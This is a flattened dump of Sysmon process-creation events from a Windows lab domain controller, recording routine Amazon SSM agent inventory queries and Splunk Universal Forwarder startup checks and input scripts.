PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell "Get-WinEvent -FilterHashtable @( @{ LogName='System'; ProviderName='Microsoft-Windows-Kernel-General'; Id=12; Level=4 }, @{ LogName='System'; ProviderName='Microsoft-Windows-WER-SystemErrorReporting'; Id=1001; Level=2 } ) | Sort-Object TimeCreated -Descending" "| Select-Object" "Id, Level, ProviderName, TimeCreated, Properties" "| ConvertTo-Json -Depth 3"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{A8622C2F-3DFF-6078-3A00-00000000AE01}3656C:\Program Files\Amazon\SSM\ssm-agent-worker.exe"C:\Program Files\Amazon\SSM\ssm-agent-worker.exe" 154100x80000000000000002626Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:12.812{A8622C2F-3E04-6078-6D00-00000000AE01}2984C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\powershell2.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-3DFE-6078-2F00-00000000AE01}2064C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000002613Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:12.702{A8622C2F-3E04-6078-6C00-00000000AE01}4088C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe 
/c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\powershell.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-3DFE-6078-2F00-00000000AE01}2064C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000002600Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:12.593{A8622C2F-3E04-6078-6B00-00000000AE01}2868C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\perfmon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-3DFE-6078-2F00-00000000AE01}2064C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000002587Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:12.484{A8622C2F-3E04-6078-6A00-00000000AE01}3776C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\admon.cmd" --scheme"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-3DFE-6078-2F00-00000000AE01}2064C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000002574Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:12.374{A8622C2F-3E04-6078-6900-00000000AE01}4000C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinRegMon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-3DFE-6078-2F00-00000000AE01}2064C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000002551Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:12.265{A8622C2F-3E04-6078-6800-00000000AE01}3872C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinPrintMon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-3DFE-6078-2F00-00000000AE01}2064C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000002536Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:12.156{A8622C2F-3E04-6078-6700-00000000AE01}3828C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinNetMon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-3DFE-6078-2F00-00000000AE01}2064C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000002518Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:12.069{A8622C2F-3E04-6078-6600-00000000AE01}4052C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell "Get-CimInstance Win32_PnPSignedDriver | Where-Object { $_.DeviceID -eq 'XENBUS\VEN_XS0001&DEV_VBD&REV_00000001\_' -or $_.DeviceClass -eq 'Net' -and ( $_.Manufacturer -like 'Intel*' -or $_.Manufacturer -eq 'Citrix Systems, Inc.' -or $_.Manufacturer -eq 'Amazon Inc.' -or $_.Manufacturer -eq 'Amazon Web Services, Inc.' 
)}" "| Select-Object" "Description, DriverVersion" "| ConvertTo-Json -Depth 3"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{A8622C2F-3DFF-6078-3A00-00000000AE01}3656C:\Program Files\Amazon\SSM\ssm-agent-worker.exe"C:\Program Files\Amazon\SSM\ssm-agent-worker.exe" 154100x80000000000000002504Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:12.046{A8622C2F-3E04-6078-6500-00000000AE01}4060C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinHostMon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-3DFE-6078-2F00-00000000AE01}2064C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000002491Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:11.939{A8622C2F-3E03-6078-6400-00000000AE01}3144C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinEventLog.cmd" --scheme"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-3DFE-6078-2F00-00000000AE01}2064C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000002478Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:11.820{A8622C2F-3E03-6078-6300-00000000AE01}3836C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\MonitorNoHandle.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-3DFE-6078-2F00-00000000AE01}2064C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000002458Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:11.658{A8622C2F-3E03-6078-6200-00000000AE01}3704C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell "Get-CimInstance Win32_PnPEntity | Where-Object { $_.Service -eq 'xenvbd' }" "| Select-Object" DeviceID "| ConvertTo-Json -Depth 3"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{A8622C2F-3DFF-6078-3A00-00000000AE01}3656C:\Program 
Files\Amazon\SSM\ssm-agent-worker.exe"C:\Program Files\Amazon\SSM\ssm-agent-worker.exe" 154100x80000000000000002441Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:11.611{A8622C2F-3E03-6078-6100-00000000AE01}4024C:\Windows\System32\wbem\WMIC.exe10.0.14393.0 (rs1_release.160715-1616)WMI Commandline UtilityMicrosoft® Windows® Operating SystemMicrosoft Corporationwmic.exewmic OS get OperatingSystemSKU /format:listC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=2CEE7F1AD77D8817E0F043E5E5ED1C83,SHA256=6679EA8FBEB539B5852CE8838420471FED0600F5050F3370DBB355DAC76BF072,IMPHASH=1B1A3F43BF37B5BFE60751F2EE2F326E{A8622C2F-3DFF-6078-3A00-00000000AE01}3656C:\Program Files\Amazon\SSM\ssm-agent-worker.exe"C:\Program Files\Amazon\SSM\ssm-agent-worker.exe" 154100x80000000000000002427Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:11.536{A8622C2F-3E03-6078-6000-00000000AE01}2752C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe8.0.2splunk Applicationsplunk ApplicationSplunk Inc.splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal check-xml-files --answer-yes --no-prompt C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3{A8622C2F-3E03-6078-5F00-00000000AE01}2484C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal check-xml-files --answer-yes --no-prompt 2>&1 154100x80000000000000002414Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:11.530{A8622C2F-3E03-6078-5F00-00000000AE01}2484C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft 
CorporationCmd.ExeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal check-xml-files --answer-yes --no-prompt 2>&1C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-3DFE-6078-2F00-00000000AE01}2064C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x80000000000000002396Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:11.255{A8622C2F-3E03-6078-5E00-00000000AE01}4052C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{A8622C2F-3E03-6078-5D00-00000000AE01}4004C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list general --no-log 154100x80000000000000002383Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:11.248{A8622C2F-3E03-6078-5D00-00000000AE01}4004C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{A8622C2F-3E03-6078-5C00-00000000AE01}4084C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list general --no-log 
154100x80000000000000002370Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:11.242{A8622C2F-3E03-6078-5C00-00000000AE01}4084C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-3E00-6078-4C00-00000000AE01}3632C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 154100x80000000000000002351Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:11.023{A8622C2F-3E03-6078-5B00-00000000AE01}3740C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell "Get-ItemProperty -Path 'HKLM:\SOFTWARE\Amazon\PVDriver'" "| Select-Object" "Name, Version" "| ConvertTo-Json -Depth 3"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{A8622C2F-3DFF-6078-3A00-00000000AE01}3656C:\Program Files\Amazon\SSM\ssm-agent-worker.exe"C:\Program Files\Amazon\SSM\ssm-agent-worker.exe" 154100x80000000000000002332Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:10.974{A8622C2F-3E02-6078-5A00-00000000AE01}3868C:\Windows\System32\wbem\WMIC.exe10.0.14393.0 (rs1_release.160715-1616)WMI Commandline UtilityMicrosoft® Windows® Operating SystemMicrosoft Corporationwmic.exewmic OS 
get OperatingSystemSKU /format:listC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=2CEE7F1AD77D8817E0F043E5E5ED1C83,SHA256=6679EA8FBEB539B5852CE8838420471FED0600F5050F3370DBB355DAC76BF072,IMPHASH=1B1A3F43BF37B5BFE60751F2EE2F326E{A8622C2F-3DFF-6078-3A00-00000000AE01}3656C:\Program Files\Amazon\SSM\ssm-agent-worker.exe"C:\Program Files\Amazon\SSM\ssm-agent-worker.exe" 154100x80000000000000002319Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:10.963{A8622C2F-3E02-6078-5900-00000000AE01}3852C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list replication_port --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{A8622C2F-3E02-6078-5800-00000000AE01}3144C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list replication_port --no-log 154100x80000000000000002306Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:10.955{A8622C2F-3E02-6078-5800-00000000AE01}3144C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list replication_port --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{A8622C2F-3E02-6078-5700-00000000AE01}3744C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list replication_port --no-log 154100x80000000000000002293Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
13:22:10.949{A8622C2F-3E02-6078-5700-00000000AE01}3744C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list replication_port --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-3E00-6078-4C00-00000000AE01}3632C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 154100x80000000000000002271Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:10.598{A8622C2F-3E02-6078-5600-00000000AE01}2060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd" check-transforms-keysC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{A8622C2F-3E00-6078-4C00-00000000AE01}3632C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 154100x80000000000000002255Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:10.551{A8622C2F-3E02-6078-5500-00000000AE01}4036C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell "Get-CimInstance Win32_OperatingSystem" "| Select-Object" "Version, OperatingSystemSKU" "| ConvertTo-Json -Depth 
3"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{A8622C2F-3DFF-6078-3A00-00000000AE01}3656C:\Program Files\Amazon\SSM\ssm-agent-worker.exe"C:\Program Files\Amazon\SSM\ssm-agent-worker.exe" 154100x80000000000000002240Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:10.296{A8622C2F-3E02-6078-5400-00000000AE01}3220C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool validate-regex --log-warningsC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{A8622C2F-3E02-6078-5300-00000000AE01}4000C:\Program Files\SplunkUniversalForwarder\bin\btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" validate-regex --log-warnings 154100x80000000000000002227Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:10.289{A8622C2F-3E02-6078-5300-00000000AE01}4000C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" validate-regex --log-warningsC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{A8622C2F-3E00-6078-4C00-00000000AE01}3632C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 
154100x80000000000000002191Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:09.995{A8622C2F-3E01-6078-5200-00000000AE01}3880C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool validate-strptime --log-warningsC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{A8622C2F-3E01-6078-5100-00000000AE01}3740C:\Program Files\SplunkUniversalForwarder\bin\btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" validate-strptime --log-warnings 154100x80000000000000002177Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:09.988{A8622C2F-3E01-6078-5100-00000000AE01}3740C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" validate-strptime --log-warningsC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{A8622C2F-3E00-6078-4C00-00000000AE01}3632C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 154100x80000000000000002159Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:22:09.565{A8622C2F-3E01-6078-5000-00000000AE01}2984C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool check --no-logC:\Windows\system32\NT 
